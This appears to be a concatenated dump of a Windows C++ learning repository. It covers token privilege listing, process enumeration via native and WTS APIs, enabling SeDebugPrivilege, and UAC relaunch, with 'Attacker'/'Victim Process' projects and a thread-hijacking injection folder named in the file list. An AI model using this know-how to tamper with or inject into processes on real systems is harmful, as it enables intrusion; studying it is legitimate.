dwDisplayName = 1000; 29 | 30 | std::wcout << "\t[" << std::setw(2) << c + 1 << L"] "; 31 | 32 | // Get the name of the privilege from LUID 33 | if (!LookupPrivilegeNameW(NULL, &tp->Privileges[c].Luid, lpName, &dwName)) { 34 | PrintError(L"LookupPrivilegeNameW()"); 35 | continue; 36 | } 37 | std::wcout << L"Name: " << lpName << std::endl; 38 | 39 | // Get the description / display for the privilege by its name 40 | if (!LookupPrivilegeDisplayNameW(NULL, lpName, lpDisplayName, &dwDisplayName, &dwLangId)) { 41 | PrintError(L"LookupPrivilegeNameW()"); 42 | continue; 43 | } 44 | std::wcout << L"\t Description: " << lpDisplayName << std::endl; 45 | 46 | switch (tp->Privileges[c].Attributes) { 47 | case SE_PRIVILEGE_ENABLED: 48 | std::wcout << L"\t Status: Enabled\n"; 49 | break; 50 | case SE_PRIVILEGE_ENABLED_BY_DEFAULT: 51 | std::wcout << L"\t Status: Enabled by Default\n"; 52 | break; 53 | case SE_PRIVILEGE_ENABLED | SE_PRIVILEGE_ENABLED_BY_DEFAULT: 54 | std::wcout << L"\t Status: Enabled by Default\n"; 55 | break; 56 | case SE_PRIVILEGE_REMOVED: 57 | std::wcout << L"\t Status: Removed\n"; 58 | break; 59 | case SE_PRIVILEGE_USED_FOR_ACCESS: 60 | std::wcout << L"\t Status: Used for Access\n"; 61 | break; 62 | case 0x0: 63 | std::wcout << L"\t Status: Disabled\n"; 64 | break; 65 | default: 66 | std::wcout << L"\t Status: N/A\n"; 67 | } 68 | 69 | VirtualFree(lpName, 0x0, MEM_RELEASE); 70 | VirtualFree(lpDisplayName, 0x0, MEM_RELEASE); 71 | lpName = nullptr; 72 | lpDisplayName = nullptr; 73 | } 74 | 75 | VirtualFree(tp, 0x0, MEM_RELEASE); 76 | tp = nullptr; 77 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | /// 7 | /// Get the serialized name of the type of SID from SID_NAME_USE value 8 | /// 9 | /// SID type value obtained from LookupAccountSidA() 10 | /// Serialized SID type 11 | LPCWSTR GetSidType(SID_NAME_USE nUse) { 12 | switch (nUse) { 13 | case SidTypeAlias: 14 | return L"Alias"; 15 | case SidTypeComputer: 16 | return L"Computer"; 17 | case SidTypeDeletedAccount: 18 | return L"Deleted Account"; 19 | case SidTypeDomain: 20 | return L"Domain"; 21 | case SidTypeGroup: 22 | return L"Group"; 23 | case SidTypeInvalid: 24 | return L"Invalid"; 25 | case SidTypeLabel: 26 | return L"Label"; 27 | case SidTypeLogonSession: 28 | return L"Logon Session"; 29 | case SidTypeUnknown: 30 | return L"Unknown"; 31 | case SidTypeUser: 32 | return L"User"; 33 | case SidTypeWellKnownGroup: 34 | return L"Well Known Group"; 35 | default: 36 | return L"N/A"; 37 | } 38 | } 39 | 40 | /// 41 | /// Get the token max length. This is required for actually getting the token information 42 | /// 43 | /// Handle to the process token from OpenProcessToken 44 | /// Class name from TOKEN_INFORMATION_CLASS whose information length you want to find out 45 | /// 46 | DWORD GetTokenInfoLength(HANDLE hTok, TOKEN_INFORMATION_CLASS tokClass) { 47 | DWORD dwRetLength = 0x0; 48 | 49 | GetTokenInformation(hTok, tokClass, NULL, 0x0, &dwRetLength); 50 | 51 | return dwRetLength; 52 | } 53 | 54 | 55 | /// 56 | /// Serialize the PSID to string and return the reference to the pointer 57 | /// 58 | /// Pointer to SID 59 | /// Reference to the name 60 | LPWSTR SIDSerialize(PSID pSid) { 61 | LPWSTR lpSid = nullptr; 62 | ConvertSidToStringSidW(pSid, &lpSid); 63 | return lpSid; 64 | } 65 | 66 | /// 67 | /// Get the account name and domain name from the SID 68 | /// 69 | /// Pointer to SID 70 | /// Preallocated pointer to receive the account name 71 | /// Preallocated pointer to recieve the domian name 72 | /// Pointer to receieve the Sid Type 73 | /// 74 | BOOL GetDomainAccount(PSID pSid, LPWSTR lpAccountName, LPWSTR lpDomainName, PSID_NAME_USE eSidType) { 75 | DWORD dwAccount, dwDomain; 76 | dwAccount = dwDomain = MAX_PATH; 77 | 78 | if (!LookupAccountSidW(nullptr, pSid, lpAccountName, &dwAccount, lpDomainName, &dwDomain, eSidType)) { 79 | VirtualFree(lpAccountName, 0x0, MEM_RELEASE); 80 | VirtualFree(lpDomainName, 0x0, MEM_RELEASE); 81 | lpAccountName = lpDomainName = nullptr; 82 | return FALSE; 83 | } 84 | 85 | return TRUE; 86 | } -------------------------------------------------------------------------------- /Process Listing/NT Query System Api/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | INT main(VOID) { 4 | DWORD dwRet; 5 | DWORD dwSize = 0x0; 6 | NTSTATUS dwStatus = STATUS_INFO_LENGTH_MISMATCH; 7 | PSYSTEM_PROCESS_INFORMATION p = nullptr; 8 | 9 | 10 | while (TRUE) { 11 | if (p != nullptr) VirtualFree(p, 0x0, MEM_RELEASE); 12 | 13 | // try to get the information details 14 | p = (PSYSTEM_PROCESS_INFORMATION)VirtualAlloc(nullptr, dwSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 15 | dwStatus = NtQuerySystemInformation(SystemProcessInformation, (PVOID)p, (ULONG)dwSize, &dwRet); 16 | 17 | // if success, break the loop and proceed to printing details 18 | // if different error than information length mismatch, exit prorgram with error message 19 | if (dwStatus == STATUS_SUCCESS) { break; } 20 | else if (dwStatus != STATUS_INFO_LENGTH_MISMATCH) { 21 | VirtualFree(p, 0x0, MEM_RELEASE); 22 | p = nullptr; 23 | std::cout << "Error fetching details" << std::endl; 24 | return 0x1; 25 | } 26 | 27 | // use the dwRet value and add extra 8kb buffer size 28 | // this will become handy when new processes are created while processing this loop 29 | dwSize = dwRet + (2 << 12); 30 | } 31 | 32 | // Print process details 33 | do { 34 | std::wcout << L"PID: " << HandleToUlong(p->UniqueProcessId) 35 | << L"\t\t\t\tSession ID: " << p->SessionId 36 | << L"\t\t\tImage Name: " << (p->ImageName.Buffer ? p->ImageName.Buffer : L"") << std::endl; 37 | 38 | std::wcout << L"# Handles: " << p->HandleCount 39 | << L"\t\t\t\t# Threads: " << p->NumberOfThreads << std::endl; 40 | 41 | std::wcout << L"Virtual Size: " << GetHumanReadableSize(p->VirtualSize) 42 | << L"\t\t\tPeak Virtual Size: " << GetHumanReadableSize(p->PeakVirtualSize) << std::endl; 43 | 44 | std::wcout << L"Pagefile Usage: " << GetHumanReadableSize(p->PagefileUsage) 45 | << L"\t\t\tPeak Pagefile Usage: " << GetHumanReadableSize(p->PeakPagefileUsage) << std::endl; 46 | 47 | std::wcout << L"Working Set Size: " << GetHumanReadableSize(p->WorkingSetSize) 48 | << L"\t\tPeak Working Set Size: " << GetHumanReadableSize(p->PeakWorkingSetSize) << std::endl; 49 | 50 | std::wcout << L"Quota Non-Paged Pool Usage: " << GetHumanReadableSize(p->QuotaNonPagedPoolUsage) 51 | << L"\tQuota Paged Pool Usage: " << GetHumanReadableSize(p->QuotaPagedPoolUsage) << std::endl; 52 | 53 | std::wcout << L"-------------------------------------------------------------------------------------" << std::endl; 54 | 55 | // Jump to next entry 56 | p = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)p + p->NextEntryOffset); 57 | } while (p->NextEntryOffset != 0); 58 | 59 | // Free the process buffer 60 | VirtualFree(p, 0x0, MEM_RELEASE); 61 | p = nullptr; 62 | 63 | return 0x0; 64 | } -------------------------------------------------------------------------------- /Process Listing/WTS Api/Source.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "pch.h" 8 | 9 | // instruction for the linker 10 | #pragma comment(lib, "Wtsapi32.lib") 11 | #pragma comment(lib, "Advapi32.lib") 12 | 13 | INT main(VOID) { 14 | // Add and confirm the debug privileges before doing anything 15 | if (!AddSeDebugPrivileges()) { 16 | // Try to evelate the process with administrator permissions with UAC prompt and exit 17 | SpawnElevatedProcess(); 18 | } 19 | 20 | // Craft parameters for WTSEnumerateProcessesExA() 21 | DWORD dwLevel = 0x1; 22 | PWTS_PROCESS_INFO_EXA pProcesses = nullptr; 23 | DWORD dwProcessCount = 0x0; 24 | 25 | // Get the pointer processes informations for the current server handle and any user session 26 | // This will allow you to get a list of processes runing not only by current user but of all user including NT AUTHORITY\SYSTEM 27 | if (!WTSEnumerateProcessesExA( 28 | WTS_CURRENT_SERVER_HANDLE, 29 | &dwLevel, 30 | WTS_ANY_SESSION, 31 | (LPSTR*)&pProcesses, 32 | &dwProcessCount 33 | )) { 34 | PrintError("WTSEnumerateProcessesExA()", TRUE); 35 | } 36 | 37 | std::cout << "Total processes found: " << dwProcessCount - 1 << std::endl; 38 | 39 | for (DWORD c = 0; c < dwProcessCount; c++) { 40 | // Skip "System Idle" process as it is reserved 41 | // https://stackoverflow.com/a/3232487/10362396 42 | if ((pProcesses + c)->ProcessId == 0) { 43 | continue; 44 | } 45 | std::cout << "PID: " << (pProcesses + c)->ProcessId << "\t\tProcess Name: " << (pProcesses + c)->pProcessName << std::endl; 46 | std::cout << "# Handles: " << (pProcesses + c)->HandleCount << "\t\t# Threads: " << (pProcesses + c)->NumberOfThreads << std::endl; 47 | 48 | // Convert the SID to the string 49 | LPSTR lpSID = nullptr; 50 | if (!ConvertSidToStringSidA((pProcesses + c)->pUserSid, &lpSID)) { 51 | std::cout << "Account SID: " << "N/A"; 52 | } else { 53 | std::cout << "Account SID: " << lpSID; 54 | } 55 | 56 | // Get the domain name and user account from SID 57 | CHAR szAccountName[MAX_PATH], szDomainName[MAX_PATH]; 58 | DWORD dwMaxPathAccount = MAX_PATH; 59 | DWORD dwMaxPathDomain = MAX_PATH; 60 | SID_NAME_USE nUse; 61 | 62 | // Get the account and domain information from the SID of the process 63 | if (!LookupAccountSidA( 64 | nullptr, 65 | (pProcesses + c)->pUserSid, 66 | szAccountName, 67 | &dwMaxPathAccount, 68 | szDomainName, 69 | &dwMaxPathDomain, 70 | &nUse 71 | )) { 72 | std::cout << "\tDomain\\Account (Type): " << "N/A (N/A)" << std::endl; 73 | } else { 74 | std::cout << "\tDomain\\Account (Type): " << szDomainName << "\\" << szAccountName << " (" << GetSidType(nUse) << ")\n"; 75 | } 76 | 77 | std::cout << "---------------------------------------------------------------------" << std::endl; 78 | } 79 | 80 | WTSFreeMemoryExA(WTSTypeProcessInfoLevel1, (PVOID)pProcesses, dwProcessCount); 81 | pProcesses = nullptr; 82 | 83 | system("pause"); 84 | return 0; 85 | } -------------------------------------------------------------------------------- /Token Dump/Token Dump/ElevationHelp.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ErrorHandling.h" 3 | #include 4 | #include 5 | 6 | /// 7 | /// Add "SeDebugPrivilege" to the current running process by adjusting token privileges and verify the details. 8 | /// NOTE: The verification process is needed because AdjustTokenPrivileges function succeeds even if the privilege is not added 9 | /// 10 | /// TRUE if privilege is added and exists in the query result, otherwise false (also if any function is failed) 11 | BOOL AddSeDebugPrivileges() { 12 | // Get the current process handle 13 | DWORD dwPid = GetCurrentProcessId(); 14 | HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); 15 | if (hProc == NULL || hProc == INVALID_HANDLE_VALUE) { 16 | PrintError(L"OpenProcess()"); 17 | return FALSE; 18 | } 19 | 20 | // Get the token handle with query information and adjust privileges access 21 | HANDLE hTok = NULL; 22 | if (!OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hTok)) { 23 | PrintError(L"OpenProcessToken()"); 24 | return FALSE; 25 | } else if (hTok == NULL || hTok == INVALID_HANDLE_VALUE) { 26 | PrintError(L"OpenProcessToken()"); 27 | return FALSE; 28 | } 29 | 30 | // Get the value of SeDebugPrivilege from text 31 | LUID pDebugPriv; 32 | if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &pDebugPriv)) { 33 | PrintError(L"LookupPrivilegeValueA()"); 34 | return FALSE; 35 | } 36 | 37 | // Adjust token privilege 38 | TOKEN_PRIVILEGES tokPrivs; 39 | tokPrivs.PrivilegeCount = 1; 40 | tokPrivs.Privileges[0].Luid = pDebugPriv; 41 | tokPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 42 | if (!AdjustTokenPrivileges(hTok, FALSE, &tokPrivs, sizeof(tokPrivs), NULL, NULL)) { 43 | PrintError(L"AdjustTokenPrivileges()"); 44 | return FALSE; 45 | } 46 | 47 | // Query token privileges to confirm whether 48 | BOOL bRes; 49 | PRIVILEGE_SET tokPrivSet; 50 | tokPrivSet.Control = PRIVILEGE_SET_ALL_NECESSARY; 51 | tokPrivSet.PrivilegeCount = 1; 52 | tokPrivSet.Privilege[0].Luid = pDebugPriv; 53 | if (!PrivilegeCheck(hTok, &tokPrivSet, &bRes)) { 54 | PrintError(L"PrivilegeCheck()"); 55 | return FALSE; 56 | } 57 | 58 | CloseHandle(hProc); 59 | CloseHandle(hTok); 60 | hProc = NULL; 61 | hTok = NULL; 62 | 63 | return bRes; 64 | } 65 | 66 | /// 67 | /// Launch an elevated process with administator privilegesand exit the current 68 | /// 69 | /// Process ID of the application to parse in elevated prompt 70 | VOID SpawnElevatedProcess(DWORD dwPID) { 71 | // Get current process image file path 72 | WCHAR szFileName[MAX_PATH]; 73 | if (!GetModuleFileNameW(NULL, szFileName, MAX_PATH)) { 74 | PrintError(L"GetModuleFileNameW()", TRUE); 75 | } 76 | 77 | // Craft the file execution information for ShellExecuteExA function 78 | SHELLEXECUTEINFOW si; 79 | si.cbSize = sizeof(SHELLEXECUTEINFOW); 80 | si.fMask = SEE_MASK_DEFAULT; 81 | si.hwnd = NULL; 82 | si.lpVerb = L"runas"; // to show UAC window 83 | si.lpFile = szFileName; 84 | si.lpParameters = { std::to_wstring(dwPID).c_str() }; 85 | si.lpDirectory = NULL; 86 | si.nShow = SW_NORMAL; 87 | 88 | // Start the process with elevated UAC 89 | if (!ShellExecuteExW(&si)) { 90 | PrintError(L"ShellExecuteExW()", TRUE); 91 | } 92 | 93 | // Exit the current process as it is no longer needed 94 | exit(1); 95 | } -------------------------------------------------------------------------------- /Process ReadWrite/Attacker RW/pch.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #pragma once 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #pragma comment(lib, "Shlwapi.lib") 10 | 11 | constexpr DWORD PAGE_SIZE = 1 << 12; 12 | 13 | /// 14 | /// Format the error message and print the human-readable message from GetLastError() 15 | /// 16 | /// Name of the function 17 | /// Whether to exit the program after displaying error message of not. By default it is FALSE 18 | VOID PrintError(LPCSTR Function, BOOL Exit = FALSE) { 19 | // Get the latest error id 20 | DWORD ErrId = GetLastError(); 21 | std::cout << "[ERR:" << ErrId << "] " << Function << ": "; 22 | 23 | // Pring the error message based on the response 24 | if (ErrId == 0) { 25 | std::cout << "Something went wrong"; 26 | } else { 27 | std::cout << std::system_category().message(ErrId); 28 | } 29 | 30 | std::cout << std::endl; 31 | 32 | // If exit flag is set, quit application with error return code 33 | if (Exit) { 34 | exit(1); 35 | } 36 | } 37 | 38 | /// 39 | /// Add "SeDebugPrivilege" to the current running process by adjusting token privileges and verify the details. 40 | /// NOTE: The verification process is needed because AdjustTokenPrivileges function succeeds even if the privilege is not added 41 | /// 42 | /// TRUE if privilege is added and exists in the query result, otherwise false (also if any function is failed) 43 | BOOL AddSeDebugPrivileges() { 44 | // Get the current process handle 45 | DWORD dwPid = GetCurrentProcessId(); 46 | HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); 47 | if (hProc == NULL || hProc == INVALID_HANDLE_VALUE) { 48 | PrintError("OpenProcess()"); 49 | return FALSE; 50 | } 51 | 52 | // Get the token handle with query information and adjust privileges access 53 | HANDLE hTok = NULL; 54 | if (!OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hTok)) { 55 | PrintError("OpenProcessToken()"); 56 | return FALSE; 57 | } else if (hTok == NULL || hTok == INVALID_HANDLE_VALUE) { 58 | PrintError("OpenProcessToken()"); 59 | return FALSE; 60 | } 61 | 62 | // Get the value of SeDebugPrivilege from text 63 | LUID pDebugPriv; 64 | if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &pDebugPriv)) { 65 | PrintError("LookupPrivilegeValueA()"); 66 | return FALSE; 67 | } 68 | 69 | // Adjust token privilege 70 | TOKEN_PRIVILEGES tokPrivs; 71 | tokPrivs.PrivilegeCount = 1; 72 | tokPrivs.Privileges[0].Luid = pDebugPriv; 73 | tokPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 74 | if (!AdjustTokenPrivileges(hTok, FALSE, &tokPrivs, sizeof(tokPrivs), NULL, NULL)) { 75 | PrintError("AdjustTokenPrivileges()"); 76 | return FALSE; 77 | } 78 | 79 | // Query token privileges to confirm whether 80 | BOOL bRes; 81 | PRIVILEGE_SET tokPrivSet; 82 | tokPrivSet.Control = PRIVILEGE_SET_ALL_NECESSARY; 83 | tokPrivSet.PrivilegeCount = 1; 84 | tokPrivSet.Privilege[0].Luid = pDebugPriv; 85 | if (!PrivilegeCheck(hTok, &tokPrivSet, &bRes)) { 86 | PrintError("PrivilegeCheck()"); 87 | return FALSE; 88 | } 89 | 90 | CloseHandle(hProc); 91 | CloseHandle(hTok); 92 | hProc = NULL; 93 | hTok = NULL; 94 | 95 | return bRes; 96 | } 97 | 98 | -------------------------------------------------------------------------------- /Token Dump/Token Dump/Token Dump.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {ea91bf44-aee1-4a60-898d-5c92789bbfd7} 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files\Token Classes 35 | 36 | 37 | Header Files\Token Classes 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files\Token Classes 44 | 45 | 46 | Header Files\Token Classes 47 | 48 | 49 | Header Files\Token Classes 50 | 51 | 52 | Header Files\Token Classes 53 | 54 | 55 | Header Files\Token Classes 56 | 57 | 58 | Header Files\Token Classes 59 | 60 | 61 | Header Files\Token Classes 62 | 63 | 64 | Header Files\Token Classes 65 | 66 | 67 | Header Files\Token Classes 68 | 69 | 70 | Header Files\Token Classes 71 | 72 | 73 | Header Files\Token Classes 74 | 75 | 76 | Header Files\Token Classes 77 | 78 | 79 | Header Files\Token Classes 80 | 81 | 82 | 83 | 84 | Source Files 85 | 86 | 87 | -------------------------------------------------------------------------------- /Process Listing/Process Listing.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.31919.166 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WTS Api", "WTS Api\WTS Api.vcxproj", "{8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PS Api", "PS Api\PS Api.vcxproj", "{3CB124C3-8199-4934-9452-66752BA0227A}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tool Help32 Api", "Tool Help32 Api\Tool Help32 Api.vcxproj", "{ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NT Query System Api", "NT Query System Api\NT System Query.vcxproj", "{03820352-F4D5-491F-BDAC-999FAC3CCEB6}" 13 | EndProject 14 | Global 15 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 16 | Debug|x64 = Debug|x64 17 | Debug|x86 = Debug|x86 18 | Release|x64 = Release|x64 19 | Release|x86 = Release|x86 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Debug|x64.ActiveCfg = Debug|x64 23 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Debug|x64.Build.0 = Debug|x64 24 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Debug|x86.ActiveCfg = Debug|Win32 25 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Debug|x86.Build.0 = Debug|Win32 26 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Release|x64.ActiveCfg = Release|x64 27 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Release|x64.Build.0 = Release|x64 28 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Release|x86.ActiveCfg = Release|Win32 29 | {8FFCDE6B-2244-4579-A36C-0C0BA8B8B7CE}.Release|x86.Build.0 = Release|Win32 30 | {3CB124C3-8199-4934-9452-66752BA0227A}.Debug|x64.ActiveCfg = Debug|x64 31 | {3CB124C3-8199-4934-9452-66752BA0227A}.Debug|x64.Build.0 = Debug|x64 32 | {3CB124C3-8199-4934-9452-66752BA0227A}.Debug|x86.ActiveCfg = Debug|Win32 33 | {3CB124C3-8199-4934-9452-66752BA0227A}.Debug|x86.Build.0 = Debug|Win32 34 | {3CB124C3-8199-4934-9452-66752BA0227A}.Release|x64.ActiveCfg = Release|x64 35 | {3CB124C3-8199-4934-9452-66752BA0227A}.Release|x64.Build.0 = Release|x64 36 | {3CB124C3-8199-4934-9452-66752BA0227A}.Release|x86.ActiveCfg = Release|Win32 37 | {3CB124C3-8199-4934-9452-66752BA0227A}.Release|x86.Build.0 = Release|Win32 38 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Debug|x64.ActiveCfg = Debug|x64 39 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Debug|x64.Build.0 = Debug|x64 40 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Debug|x86.ActiveCfg = Debug|Win32 41 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Debug|x86.Build.0 = Debug|Win32 42 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Release|x64.ActiveCfg = Release|x64 43 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Release|x64.Build.0 = Release|x64 44 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Release|x86.ActiveCfg = Release|Win32 45 | {ADE2FA3E-B25C-47CA-8E12-EA6F87101AA6}.Release|x86.Build.0 = Release|Win32 46 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Debug|x64.ActiveCfg = Debug|x64 47 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Debug|x64.Build.0 = Debug|x64 48 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Debug|x86.ActiveCfg = Debug|Win32 49 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Debug|x86.Build.0 = Debug|Win32 50 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Release|x64.ActiveCfg = Release|x64 51 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Release|x64.Build.0 = Release|x64 52 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Release|x86.ActiveCfg = Release|Win32 53 | {03820352-F4D5-491F-BDAC-999FAC3CCEB6}.Release|x86.Build.0 = Release|Win32 54 | EndGlobalSection 55 | GlobalSection(SolutionProperties) = preSolution 56 | HideSolutionNode = FALSE 57 | EndGlobalSection 58 | GlobalSection(ExtensibilityGlobals) = postSolution 59 | SolutionGuid = {8619E34D-DFE6-4526-B9A2-CF4AC33FD2AB} 60 | EndGlobalSection 61 | EndGlobal 62 | -------------------------------------------------------------------------------- /Process ReadWrite/Process ReadWrite.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.31919.166 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Victim Process", "Victim Process\Victim Process.vcxproj", "{CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Attacker Read", "Attacker Read\Attacker Read.vcxproj", "{8054ECB7-9C72-4821-AB30-949AD7BCE742}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Attacker Write", "Attacker Write\Attacker Write.vcxproj", "{5CE0D55C-9827-4A60-AEF2-DE4768B38846}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Attacker RW", "Attacker RW\Attacker RW.vcxproj", "{EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}" 13 | EndProject 14 | Global 15 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 16 | Debug|x64 = Debug|x64 17 | Debug|x86 = Debug|x86 18 | Release|x64 = Release|x64 19 | Release|x86 = Release|x86 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Debug|x64.ActiveCfg = Debug|x64 23 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Debug|x64.Build.0 = Debug|x64 24 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Debug|x86.ActiveCfg = Debug|Win32 25 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Debug|x86.Build.0 = Debug|Win32 26 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Release|x64.ActiveCfg = Release|x64 27 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Release|x64.Build.0 = Release|x64 28 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Release|x86.ActiveCfg = Release|Win32 29 | {CEC28E83-9DFA-4D37-9B08-2CF4C2CE0A6F}.Release|x86.Build.0 = Release|Win32 30 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Debug|x64.ActiveCfg = Debug|x64 31 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Debug|x64.Build.0 = Debug|x64 32 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Debug|x86.ActiveCfg = Debug|Win32 33 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Debug|x86.Build.0 = Debug|Win32 34 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Release|x64.ActiveCfg = Release|x64 35 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Release|x64.Build.0 = Release|x64 36 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Release|x86.ActiveCfg = Release|Win32 37 | {8054ECB7-9C72-4821-AB30-949AD7BCE742}.Release|x86.Build.0 = Release|Win32 38 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Debug|x64.ActiveCfg = Debug|x64 39 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Debug|x64.Build.0 = Debug|x64 40 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Debug|x86.ActiveCfg = Debug|Win32 41 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Debug|x86.Build.0 = Debug|Win32 42 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Release|x64.ActiveCfg = Release|x64 43 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Release|x64.Build.0 = Release|x64 44 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Release|x86.ActiveCfg = Release|Win32 45 | {5CE0D55C-9827-4A60-AEF2-DE4768B38846}.Release|x86.Build.0 = Release|Win32 46 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Debug|x64.ActiveCfg = Debug|x64 47 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Debug|x64.Build.0 = Debug|x64 48 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Debug|x86.ActiveCfg = Debug|Win32 49 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Debug|x86.Build.0 = Debug|Win32 50 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Release|x64.ActiveCfg = Release|x64 51 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Release|x64.Build.0 = Release|x64 52 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Release|x86.ActiveCfg = Release|Win32 53 | {EAF4DD74-916D-475D-A7DE-BB1B7AB48E33}.Release|x86.Build.0 = Release|Win32 54 | EndGlobalSection 55 | GlobalSection(SolutionProperties) = preSolution 56 | HideSolutionNode = FALSE 57 | EndGlobalSection 58 | GlobalSection(ExtensibilityGlobals) = postSolution 59 | SolutionGuid = {7CE00DC6-C859-4891-9D58-4E3019F2E9DD} 60 | EndGlobalSection 61 | EndGlobal 62 | -------------------------------------------------------------------------------- /Process Injection/Thread Hijacking/process_utils.cpp: -------------------------------------------------------------------------------- 1 | #include "process_utils.h" 